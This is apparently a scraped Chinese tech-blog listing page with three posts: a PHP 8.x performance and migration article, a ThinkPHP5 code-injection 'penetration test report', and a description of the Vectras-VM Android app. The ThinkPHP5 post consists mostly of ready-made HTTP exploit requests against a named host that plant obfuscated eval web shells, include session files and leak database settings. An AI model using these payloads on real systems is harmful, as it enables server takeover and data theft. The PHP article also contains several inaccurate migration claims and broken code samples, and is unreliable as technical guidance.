性能，PHP 8.1 中引入的枚举在代码可读性、可维护性和运行在 Web 服务器上的 Web 应用程序的效率方面提供了显著的优势。通过将字符串或常量值替换为枚举，开发人员可以减少共享内存的使用，提高值比较的速度，从而提高代码执行效率，并最终提高 Web 应用程序的 PHP 性能。在最新的 PHP 版本中引入枚举还使开发人员能够创建更有意义和更具表现力的 API，这可以改善开发团队之间的沟通和协作。枚举作为一种文档形式，使开发人员更容易理解预期值及其用途。通过将枚举合并到代码库中，开发人员可以减少误解和错误的可能性，进一步提高应用程序性能和 PHP Web 应用程序的整体可靠性。只读属性专注于 PHP 性能，在 Web 服务器上运行的 PHP 应用程序中实现只读属性允许开发人员避免与可变状态管理相关的性能开销。通过强制不变性，对代码库中对象行为的推理变得更简单，有助于最小化错误并提高代码的可维护性。因此，只读属性有助于更稳定和更高性能的 Web 应用程序。在 PHP 应用程序中添加只读属性还可以增强原生 PHP 函数的安全性以及数据库查询的处理和处理时间。通过强制执行不变性，开发人员可以降低对类属性进行未经授权修改的风险，这可能有助于防止某些类型的漏洞。此外，只读属性有助于在 Web 应用程序的不同组件之间建立清晰的边界和契约，从而促进更模块化和更安全的代码库。这反过来又为 PHP Web 应用程序带来了更好的性能和稳定性。 Fibers 纤维为了强调 PHP 的性能，PHP 8.X 中引入的 Fiber 标志着在 Web 服务器上运行的 PHP 应用程序的并发管理方面的重大变化。与传统线程相比，纤程的轻量级特性最小化了与上下文切换相关的开销。这会带来更好的资源利用率和更高的吞吐量，特别是在具有高并发需求的 Web 应用程序中。通过实现纤程，开发人员可以创建更高性能和可伸缩的 PHP 应用程序，突出了 PHP 8.X 的进步。在 PHP 8.X 中采用纤程有可能改变 PHP 开发人员在 Web 应用程序中管理并发和并行的方式，包括那些涉及数据库查询和处理时间的应用程序。使用 Fibers，开发人员可以构建响应更快、更高效的 PHP 应用程序，从而更好地利用现代硬件资源，如多核处理器。此外，纤程支持更容易访问的异步编程方法，吸引了更广泛的开发人员。因此，纤程在开发更高性能、可伸缩性和可维护性的 PHP 应用程序方面发挥着至关重要的作用，展示了 PHP 生态系统的持续发展。图片使用字符串键和一级可调用对象的数组解包这些语法改进通过允许开发人员更有效地执行数组操作和操作可调用对象来简化和精简应用程序代码。这些特性有助于提高代码的可读性和可维护性。这些改进不仅通过更快的加载时间和更短的延迟使最终用户受益，而且还减少了服务器资源消耗，为企业和组织节省了成本。总的来说，这些功能有助于使 PHP 8.X 成为 Web 开发人员更强大，更有表现力和更高效的选择。 PHP 8.X 对性能改进的关注可以追溯到对更快、更高效的 Web 应用程序的需求。随着互联网的快速发展和用户期望的不断提高，开发人员一直在寻求优化应用程序性能的方法。 PHP 8.X 通过在语言级别提供大量优化来满足这一需求，允许开发人员提供更快，响应更快的 Web 应用程序，而无需大量的应用程序代码重构。这些改进不仅使最终用户受益，还减少了服务器资源消耗，最终为企业和组织节省了成本。 JIT Just-In-Time（JIT）编译器是 PHP 8.X 中引入的最重要的性能改进特性之一。作为 PHP 8.0 版本的关键组件，JIT 编译器旨在提高 PHP 脚本的执行速度，使其成为该语言性能的游戏规则改变者。 JIT 编译器的工作原理是在运行时将 PHP 代码中频繁执行的部分转换为机器代码，而不是传统的动态解释 PHP 代码的方法。编译后的机器代码的执行速度比解释后的代码快得多，从而大大提高了性能。 JIT 编译器以两种模式运行：函数和跟踪 JIT。函数 JIT 编译整个函数，而跟踪 JIT 编译频繁执行的较小代码路径。要了解 JIT 编译器对实际应用程序的影响，必须认识到并非所有 PHP 应用程序都能看到相同程度的性能改进。JIT 编译器的优势在 CPU 密集型任务中变得更加明显，例如数学计算、图像处理和复杂的数据操作。对于许多典型的 Web 应用程序，性能改进可能不太明显，因为这些应用程序通常是 I/O 绑定的，这意味着瓶颈与数据库查询和文件系统访问等输入/输出操作有关，而不是 CPU 绑定的任务。然而，JIT 编译器的引入仍然有潜力为 PHP 在其他领域中打开新的可能性并提高性能。例如，PHP 可能成为高性能计算、机器学习和实时应用程序的一个更可行的选择，在这些应用程序中，提高的执行速度可能会产生重大影响。优化的函数调用和类型声明在 PHP 8.X 中，对函数调用和类型声明进行了一些改进，有助于在为 Web 服务器和 Web 服务开发 PHP 应用程序时增强性能和更有效的代码执行。这些优化包括以下内容更快的函数调用 PHP 8.X 为内部函数和用户定义函数引入了更有效的类型检查。这种改进是通过在编译阶段更好地处理类型检查来实现的，这减少了与运行时类型检查相关的开销。此外，PHP 8.X 还优化了联合类型的检查方式，从而进一步提高了性能。类型检查的这些增强有助于提高 PHP 应用程序的整体性能，帮助消除可能由低效类型处理引起的潜在瓶颈和性能问题。此外，改进的类型检查可以减少数据库负载，降低查询速度和改善业务逻辑，因为它确保只处理和存储有效数据，从而提高数据库操作和 SQL 查询的效率。通过专注于类型检查优化，PHP 8.X 使开发人员能够微调 PHP 性能，并创建更健壮和更高效的应用程序，可以更好地处理现代 Web 服务器和动态 Web 页面的需求。图片改进的类型检查在 PHP 8.X 版中，引入了对内部函数和用户定义函数进行更有效的类型检查，从而显著提高了性能。通过在编译阶段优化类型检查，PHP 8.X 还减少了与运行时类型检查相关的开销，同时还增强了对联合类型的处理。这些增强功能有助于提高应用程序的整体性能，这对于需要快速加载时间和响应能力的 Web 应用程序至关重要。改进的类型检查有助于消除可能由低效类型处理引起的潜在瓶颈和性能问题，从而使 Web 应用程序更加稳定和高效。此外，这种优化确保只处理和存储有效数据，从而提高数据库操作的效率并减少页面加载时间。通过对类型检查优化的关注，PHP 8.X 为开发人员提供了工具来微调应用程序的性能，并创建更健壮、更高效的 Web 应用程序。这在性能基准测试的上下文中特别有益，因为它允许开发人员准确地测量和比较其应用程序的性能与行业标准或竞争对手。通过利用这些性能改进，开发人员可以更快地编写代码，构建更好地满足现代 Web 服务器需求的 Web 应用程序，并提供更好的用户体验。命名参数 PHP 8.X 及以后版本中引入的命名参数提供了改进代码优化和可读性之外的好处。它们还可以在某些情况下有助于性能优化。通过使用命名参数，开发人员可以在调用函数时跳过不必要的参数，从而减少需要处理的数据量。这些优化通过最小化与函数调用和类型声明相关的开销来增强性能。通过优化语言的这些基本方面，PHP 8.X 可以更有效地执行代码，从而缩短加载时间并提高 Web 应用程序的整体性能。这些改进对实际应用程序的影响取决于特定的用例和编码实践。具有大量函数调用和广泛使用类型声明的应用程序可能会获得更显著的性能提升。总的来说，这些优化有助于提高响应速度和效率的用户体验，并减少服务器资源消耗，通过解决性能瓶颈和增强 Web 服务器上的应用程序性能，使最终用户和企业受益。图片 PHP 8.X 兼容性和迁移从旧版本迁移到 PHP 8.X 及更高版本可以提供显著的性能改进，但开发人员也可能会遇到兼容性方面的挑战，这是由于不推荐使用的功能、函数行为的更改或新语法和功能的引入。为了确保顺利的迁移过程，开发人员应该意识到这些潜在的问题，并采用最佳实践来最大限度地减少中断。以下是迁移到 PHP 8.X 时需要注意的事项的综合列表。删除的扩展和功能 PHP 8.X 及以后的版本已经删除了几个扩展和函数，这些扩展和函数要么被弃用，要么有更好的替代品。如果您的代码依赖于这些删除，则这些删除可能会导致兼容性问题。例如 ext/ereg扩展已经被删除，以支持更高效的ext/pcre扩展。准备好重构代码以进行代码优化，从而使用更新的函数或替代方案。删除的扩展和函数示例在 PHP 8.X 中删除了functionfunction（）函数。如果你的代码使用了匿名函数（），你需要重构它来使用匿名函数（闭包）。 // Old code using create_function() $func = create_function('$x', 'return $x $x;'); echo $func(5); // Output: 25 // Updated code using an anonymous function $func = function($x) { return $x $x; }; echo $func(5); // Output: 25错误报告和处理的变化 PHP 8.X 引入了错误报告和处理的变化，将许多运行时通知，警告和错误转换为更严重的异常。这一更改意味着以前在代码中隐藏的问题现在可能会导致未处理的异常，导致 PHP 应用程序出现意外行为或过早终止。检查错误处理和日志记录策略，确保它们与 PHP 8.X 兼容。错误报告和处理示例中的更改：在 PHP 8.X 中，传递给函数的参数太少将引发TypeError异常而不是警告。要处理此更改，您应该更新错误处理代码以捕获TypeError异常。 function add($a, $b) { return $a + $b; } try { echo add(5); // Throws a TypeError exception in PHP 8.X } catch (TypeError $e) { echo "Error: " . $e->getMessage(); }核心类中的不兼容更改 PHP 8.X 对几个核心类进行了更改，这可能会导致兼容性问题。例如，Serializable接口已被弃用，并被serialize（）和unserialize（）魔术方法所取代。如果您的代码依赖于实现Serializable接口的类，则需要相应地更新它们。核心类中的不兼容更改示例：如前所述，Serializable接口已被弃用。如果你有一个实现这个接口的类，你应该更新它以使用serialize（）和unserialize（）魔术方法。 // Old code using Serializable interface class MyClass implements Serializable { // ... public function serialize() { // ... } public function unserialize($data) { // ... } }// Updated code using serialize() and unserialize() magic methods class MyClass { // ... public function serialize(): array { // ... } public function unserialize(array $data): void { // ... } }函数和方法签名的更改 PHP 8.X 中的某些函数和方法更新了签名，如果您的代码依赖于旧的签名，这可能会导致兼容性问题。例如，PHP 8.0 引入了对反射 API 中各种方法的签名的更改，例如：ReflectionMethod::invoke（）方法。准备好更新代码以符合新的函数和方法签名。函数和方法签名的更改示例：ReflectionParameter::getClass（）方法在 PHP 8.X 中已被弃用，您应该改用ReflectionParameter::getType（）方法。 function foo(ReflectionParameter $param) { // Old code using getClass() $class = $param->getClass(); // Updated code using getType() $type = $param->getType(); if ($type instanceof ReflectionNamedType) { $class = $type->getName(); } }默认行为的更改 PHP 8.X 更改了一些函数和特性的默认行为，这可能会导致兼容性问题。例如，默认错误报告级别已更改为包括所有错误、通知和警告。如果依赖以前的默认错误报告级别，此更改可能会导致代码中出现意外行为。默认行为更改示例：在 PHP 8.X 中，strip_tags（）函数现在默认从输入字符串中删除前导和尾随空格。如果您的代码依赖于前面的行为，则可能需要对其进行相应的调整。 $input = " <b> Hello, World! </b> "; $output = strip_tags($input); echo $output; // Output in PHP 8.X: "Hello, World!"语言结构的变化 PHP 8.X 对某些语言结构进行了更改，这可能会导致兼容性问题。例如，switch构造现在支持严格的类型检查，如果您的代码不符合新的要求，这可能会导致类型错误。准备好更新代码以符合语言构造中的更改。语言结构的变化示例：在 PHP 8.X 中，switch结构使用严格的类型检查，这意味着不相同的类型将不再匹配。更新代码以使用严格类型，或将值显式强制转换为所需类型。 $number = "42"; // String // Old code: PHP 7.x would match this case switch ($number) { case 42: echo "Matched!"; break; default: echo "Not matched!"; }// Updated code: PHP 8.X requires strict types or explicit casting switch ((int) $number) { case 42: echo "Matched!"; break; default: echo "Not matched!"; }图片 PHP 7 和 PHP 8 的性能比较未来之路：拥抱 PHP 8.X 更好的性能 PHP 8.X 引入了许多性能改进，使其成为 Web 开发的强大工具。您几乎可以将本文的内容用作 php 性能调优提示指南。即时（JIT）编译器、优化的函数调用和类型声明有助于更快、更高效的 Web 应用程序，而命名参数、属性和匹配表达式等新语言功能则提供了更高的性能和可读性。迁移到 PHP 8.X 还需要解决潜在的兼容性问题，例如删除的扩展和函数，错误报告和处理的更改，核心类的更新，以及函数和方法签名，默认行为和语言结构的更改。仔细的规划和遵循最佳实践可以确保平稳的过渡，并帮助开发人员充分利用 PHP 8.X 的性能增强。如果您正在考虑迁移到 PHP 8.X 或希望优化现有的 PHP 应用程序，那么 Jupiter 可以提供帮助。我们的专家团队专注于调整 Web 性能关键指标、扩展 Web 应用程序、降低开发成本、缩短上市时间、改善用户体验、保护 Web 应用程序、确保质量和可靠性以及维护 Web 产品。

技术教程 # PHP

易航 1月28日
0 12 0
2025-01-27
ThinkPHP5 代码注入漏洞总结渗透测试报告 tp5_construct_code_exec_2 漏洞 url：http://blog.bri6.cn/index.php?s=captcha 漏洞验证请求包： POST /index.php?s=captcha HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Content-type: application/x-www-form-urlencoded Cache-Control: no-cache Pragma: no-cache Host: w1.ltfta5.site Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Content-Length: 60 Connection: close _method=__construct&method=GET&filter[]=var_dump&get[]=dylan响应包: HTTP/1.1 200 OK Server: nginx Date: Thu, 02 Mar 2023 05:21:43 GMT Content-Type: image/png; charset=utf-8 Content-Length: 1876 Connection: close Set-Cookie: PHPSESSID=v8cee56q175b9p0907sv4lchl4; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache string(5) "dylan" string(11) "__construct" string(3) "GET" string(8) "var_dump" string(5) "dylan" NULL PNG 存在漏洞 payload1 POST /index.php?s=captcha HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Content-type: application/x-www-form-urlencoded Cache-Control: no-cache Pragma: no-cache Host: w1.ltfta5.site Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Content-Length: 125 Connection: close _method=__construct&method=GET&filter[]=system&get[]=echo+'%3C%3Fphp+%40eval%28%24_POST%5B%22kkk%22%5D%29%3B%3F%3E'+>bak1.phppayload2 POST /index.php?s=captcha HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Content-type: application/x-www-form-urlencoded Cache-Control: no-cache Pragma: no-cache Host: w1.ltfta5.site Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Content-Length: 125 Connection: close _method=__construct&method=GET&filter[]=system&get[]=echo+"%3C%3Fphp+%40eval%28%24_POST%5B%27kkk%27%5D%29%3B%3F%3E"+>bak1.phppayload3 POST /index.php?s=captcha HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Content-type: application/x-www-form-urlencoded Cache-Control: no-cache Pragma: no-cache Host: w1.ltfta5.site Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Content-Length: 142 Connection: close _method=__construct&method=GET&filter[]=assert&get[]=file_put_contents('bak1.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydra2snXSk7Pz4%3D'))写入成功 tp5_index_construct_rce 漏洞 url：http://blog.bri6.cn/index.php?s=index/index/index 漏洞验证请求包: POST /index.php?s=index/index/index HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Content-type: application/x-www-form-urlencoded Cache-Control: no-cache Pragma: no-cache Host: w1.ltfta5.site Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Content-Length: 52 Connection: close s=xskfC&_method=__construct&method&filter[]=var_dump响应包: HTTP/1.1 500 Internal Server Error Server: nginx Date: Thu, 02 Mar 2023 05:41:02 GMT Content-Type: text/html; charset=UTF-8 Connection: close Set-Cookie: PHPSESSID=08bvf36sj6d6n1n8d0jrvqp184; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 282 string(5) "xskfC" string(11) "__construct" string(0) "" string(8) "var_dump" string(5) "xskfC" string(11) "__construct" string(0) "" string(8) "var_dump" string(5) "xskfC" string(11) "__construct" string(0) "" string(8) "var_dump" 链接无效！请联系客服获取有效链接！漏洞存在 payload POST /index.php?s=index/index/index HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Content-type: application/x-www-form-urlencoded Cache-Control: no-cache Pragma: no-cache Host: w1.ltfta5.site Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Content-Length: 186 Connection: close s=file_put_contents('bak5.php',base64_decode('PD9waHAgJGE9In4rZCgpIl4iIXsre30iO0AkYj1iYXNlNjRfZGVjb2RlKCR7JGF9WyJhIl0pO2V2YWwoIiIuJGIpOz8%2B'))&_method=__construct&method&filter[]=assert写入成功 tp5_session_include 漏洞 url：http://blog.bri6.cn/index.php/index 漏洞验证请求数据包: POST /index.php/index HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Cookie: PHPSESSID=uzozteeqzqb0lxop0bi3awl9g Content-type: application/x-www-form-urlencoded Cache-Control: no-cache Pragma: no-cache Host: w1.ltfta5.site Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Content-Length: 113 Connection: close _method=__construct&method=GET&filter[]=think\__include_file&get[]=/tmp/sess_uzozteeqzqb0lxop0bi3awl9g&server[]=1响应结果: think|a:5:{s:4:"test";s:0:"";s:11:"__construct";s:0:"";s:18:"think\Session::set";s:0:"";s:3:"get";s:0:"";i:1;s:0:"";}payload POST /index.php?s=captcha HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Cookie: PHPSESSID=q1ces7rkvhr3gg7t9daaxkh9w Content-type: application/x-www-form-urlencoded Cache-Control: no-cache Pragma: no-cache Host: w1.ltfta5.site Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Content-Length: 260 Connection: close _method=__construct&filter[]=think\Session::set&method=get&get[]=<?php+$a='file_put_contents';$b='base64_decode';$a($b('YmFrLnBocA=='),$b('PD9waHAgQGV2YWwoJF9QT1NUWydra2snXSk7Pz4='));?>&server[]=1写入成功 tp5_invoke_func_code_exec_1 漏洞 url：http://blog.bri6.cn/index.php?s=index/think\app/invokefunction&function=phpinfo&vars[0]=-1 漏洞验证请求包: GET /index.php?s=index/think\app/invokefunction&function=phpinfo&vars[0]=-1 HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Cache-Control: no-cache Pragma: no-cache Host: w1.ltfta5.site Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Connection: close响应包: phpinfo页面漏洞存在 payload GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=bak6.php&vars[1][]=%3C%3Fphp+%24a%3D%22%7E%2Bd%28%29%22%5E%22%21%7B%2B%7B%7D%22%3B%40%24b%3Dbase64_decode%28%24%7B%24a%7D%5B%22a%22%5D%29%3Beval%28%22%22.%24b%29%3B%3F%3E HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Cache-Control: no-cache Pragma: no-cache Host: w1.ltfta5.site Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Connection: closetp5_dbinfo_leak 漏洞(数据库信息泄露) url：http://blog.bri6.cn/index.php?s=index/think\config/get&name=database.hostname 漏洞验证请求包: GET /?s=index/think\config/get&name=database.hostname HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Cache-Control: no-cache Pragma: no-cache Host: w1.ltfta5.site Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Connection: close响应包: HTTP/1.1 200 OK Server: nginx Date: Thu, 02 Mar 2023 05:51:35 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding Content-Length: 9 localhost漏洞存在 payload1 GET /?s=index/think\config/get&name=database.hostname HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Cache-Control: no-cache Pragma: no-cache Host: w1.ltfta5.site Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Connection: closepayload2 GET /?s=index/think\config/get&name=database.hostport HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Cache-Control: no-cache Pragma: no-cache Host: w1.ltfta5.site Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Connection: closepayload3 GET /?s=index/think\config/get&name=database.hostport HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Cache-Control: no-cache Pragma: no-cache Host: w1.ltfta5.site Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Connection: closepayload4 GET /?s=index/think\config/get&name=database.database HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Cache-Control: no-cache Pragma: no-cache Host: w1.ltfta5.site Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Connection: closepayload5 GET /?s=index/think\config/get&name=database.username HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Cache-Control: no-cache Pragma: no-cache Host: w1.ltfta5.site Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Connection: close

技术教程 # PHP # ThinkPHP

易航 1月27日
0 86 0
2025-01-27
在 Android 设备上免刷机 ROOT 运行任意操作系统项目简介 Vectras-VM-Android 为用户提供一个轻量级、高效的虚拟化解决方案，利用现代 Android 设备的强大处理能力，让用户可以在 Android 设备上运行多个操作系统，包括但不限于 Linux 发行版、Windows、macOS 等。它基于 QEMU 开发，相较于 Limbo 和 Bochs，其内核更新，没有镜像大小限制，能更好地利用手机强大硬件性能，运行起来更快。图片核心功能多系统支持：拥有广泛的系统兼容性，无论是经典的 Windows 系统，还是苹果的 Mac OS X，亦或是开源的 Linux，都能在安卓手机上流畅运行。高效运行：采用了先进的虚拟化技术，能够充分利用安卓手机的硬件资源，确保虚拟操作系统运行的高效性和稳定性。即使是在配置相对普通的手机上，也能获得较为流畅的操作体验，让用户在手机上也能享受到类似电脑的操作感受。 ROM 商店：提供了 ROM 商店，用户可以下载各种系统安装，其中包括 Windows、Linux、macOS 等，使用起来很方便。资源分配优化：智能分配 CPU、内存、存储等硬件资源，确保每个虚拟机都能获得最佳性能表现。快照与恢复：提供快速创建和回滚快照的功能，方便用户保存特定状态并在需要时迅速恢复。小窗口分屏模式：当用户退出主屏幕或切换到其他应用时，虚拟系统内的游戏和应用仍能在小窗口中继续运行，不影响当前操作。无缝多任务处理：支持同时打开多个应用，并在不同任务间自由切换，提升工作效率和娱乐体验。锁屏托管：即使手机处于锁屏状态，虚拟系统中的任务也能继续执行，如接收消息通知、后台下载等，确保重要信息不会遗漏。项目地址隐藏内容，请前往内页查看详情图片简单的使用教程首次下载安装打开，会需要进行初始化，这里选择Auto setup即可，该阶段需要你拥有一个良好的网络环境：图片初始化完成会自动进入到首页：图片这里我们可以在 ROM 商店中查找需要运行的系统，只不过目前只能下载到 Windows 和 Linux 的系统，至于 MacOS 的我没找到在哪里添加：图片选中我们要创建的虚拟机，例如我这里选择的是Windows XP，然后点击继续会询问你是否去下载系统镜像或者导入本机已有的，我们需要现在下载：图片下载完成后，再次点击继续选择Select that file now来选择下载的cvbi文件，根据提示进行导入点击ADD即可：图片在首页中，点击虚拟机就可以启动对应的虚拟机：图片目前我尝试去运行 Linux 和 MacOS 感兴趣的朋友可以自己去尝试一下。注意部分设备在 Android 14+ 上不支持使用此服务： oppo Realme 华为荣耀 vivo 但是以下设备是支持使用的：三星谷歌小米澎湃 OS 红魔官方虽然称可以在以上设备中使用，但是无法保证它的稳定性，大家可以去尝试一下。

程序软件 # Android软件

易航 1月27日
0 42 0